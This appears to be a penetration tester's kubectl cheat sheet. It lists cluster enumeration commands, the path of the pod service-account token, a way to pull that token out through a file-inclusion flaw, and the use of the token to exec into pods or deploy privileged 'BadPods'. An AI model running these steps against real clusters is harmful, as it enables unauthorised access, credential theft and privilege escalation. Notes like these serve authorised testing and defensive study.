# Kubectl

* Get pods, `-A` for all namespaces
```sh
kubectl get pods -A 
```
* Check mounted secret
```sh
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
```
* Intel about a secret, and output
```sh
kubectl describe secrets <secret> 
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json'
```
## Abuse Token
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
* By change of an LFI extract the token and 
```sh
kubectl auth can-i --list --token=$TOKEN
kubectl get pods  --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
```

## Create Pods

* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
```sh
kubectl apply -f pod.yml --token=$TOKEN
```
* Start Pod
```sh
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
```

## Start Pods

```sh
kubectl exec -it  <podname> -n <namespace> -- /bin/bash
```